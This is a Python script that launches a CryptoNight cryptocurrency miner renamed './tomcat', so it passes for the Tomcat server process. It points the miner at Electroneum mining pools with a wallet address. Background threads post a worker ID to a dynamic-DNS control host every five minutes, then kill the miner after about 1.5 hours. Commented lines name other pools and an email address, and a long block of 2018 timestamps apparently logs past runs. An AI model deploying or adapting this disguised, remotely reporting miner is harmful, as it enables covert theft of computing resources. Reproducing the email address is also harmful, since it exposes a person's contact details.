import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:05.968674
#2018-02-17 16:38:01.504131
#2018-02-17 18:26:04.091419
#2018-02-17 20:14:03.643623
#2018-02-17 22:02:05.577631
#2018-02-17 23:46:06.248296
#2018-02-18 01:34:07.217042
#2018-02-18 03:21:04.008858
#2018-02-18 05:09:04.895021
#2018-02-18 07:01:06.206052
#2018-02-18 08:50:05.831429
#2018-02-18 10:37:05.474931
#2018-02-18 12:22:06.261849
#2018-02-18 14:09:04.430487
#2018-02-18 15:59:04.817237
#2018-02-18 17:49:04.171914
#2018-02-18 19:35:08.847013
#2018-02-18 21:20:07.781341
#2018-02-18 23:08:06.883824
#2018-02-19 00:55:06.727306
#2018-02-19 02:42:04.060663
#2018-02-19 04:29:01.910811
#2018-02-19 06:14:06.766708
#2018-02-19 08:02:04.999672
#2018-02-19 09:53:08.228465
#2018-02-19 11:42:07.931521
#2018-02-19 13:29:07.737914
#2018-02-19 15:17:07.170001
#2018-02-19 17:05:07.075295
#2018-02-19 18:51:06.335384
#2018-02-19 20:29:04.405571
#2018-02-19 22:17:05.236125
#2018-02-20 00:04:02.154939
#2018-02-20 01:51:06.711345
#2018-02-20 03:41:08.092259
#2018-02-20 05:26:07.321519
#2018-02-20 07:10:07.990555
#2018-02-20 08:56:01.509928
#2018-02-20 10:40:07.706155
#2018-02-20 12:26:09.436682
#2018-02-20 14:14:06.566446
#2018-02-20 15:58:08.500452
#2018-02-20 17:45:01.541272
#2018-02-20 19:38:04.377025
#2018-02-20 21:23:06.177046
#2018-02-20 23:07:06.770640
#2018-02-21 00:50:07.585102
#2018-02-21 02:37:02.242620
#2018-02-21 04:25:08.367960
#2018-02-21 06:14:08.627767
#2018-02-21 08:00:04.111396
#2018-02-21 09:45:09.770020
#2018-02-21 11:35:08.190613
#2018-02-21 13:24:08.752671
#2018-02-21 15:09:11.285464
#2018-02-21 16:58:09.199469
#2018-02-21 18:47:03.029047
#2018-02-21 20:34:06.580670
#2018-02-21 22:20:06.189032
#2018-02-22 00:09:03.768183
#2018-02-22 01:57:06.792700
#2018-02-22 03:44:01.713285
#2018-02-22 05:31:07.152326
#2018-02-22 07:16:04.409732
#2018-02-22 09:03:08.321722
#2018-02-22 10:54:04.743718
#2018-02-22 12:40:12.104604
#2018-02-22 14:27:09.563273
#2018-02-22 16:13:06.974885
#2018-02-22 17:59:07.069928
#2018-02-22 19:49:09.756743
#2018-02-22 21:39:01.353257
#2018-02-22 23:27:05.639906
#2018-02-23 01:14:03.658428
#2018-02-23 03:01:02.192415
#2018-02-23 04:48:04.569048
#2018-02-23 06:34:03.465104
#2018-02-23 08:22:05.350804
#2018-02-23 10:38:06.294962
#2018-02-23 12:34:07.294502
#2018-02-23 14:21:05.652807
#2018-02-23 16:13:08.924026
#2018-02-23 17:58:09.194555
#2018-02-23 19:43:07.223404
#2018-02-23 21:26:01.275477
#2018-02-23 23:16:04.550362
#2018-02-24 01:12:05.379559
#2018-02-24 03:04:07.320591
#2018-02-24 04:51:07.660183
#2018-02-24 06:37:05.041417
#2018-02-24 08:26:06.176511
#2018-02-24 10:11:03.747996
#2018-02-24 12:05:06.307343
#2018-02-24 13:53:04.993459
#2018-02-24 15:45:07.444109
#2018-02-24 17:42:07.237002
#2018-02-24 19:27:04.773169
#2018-02-24 21:17:06.917116
#2018-02-25 01:20:07.660290
#2018-02-25 05:25:05.623733
#2018-02-25 11:35:01.774734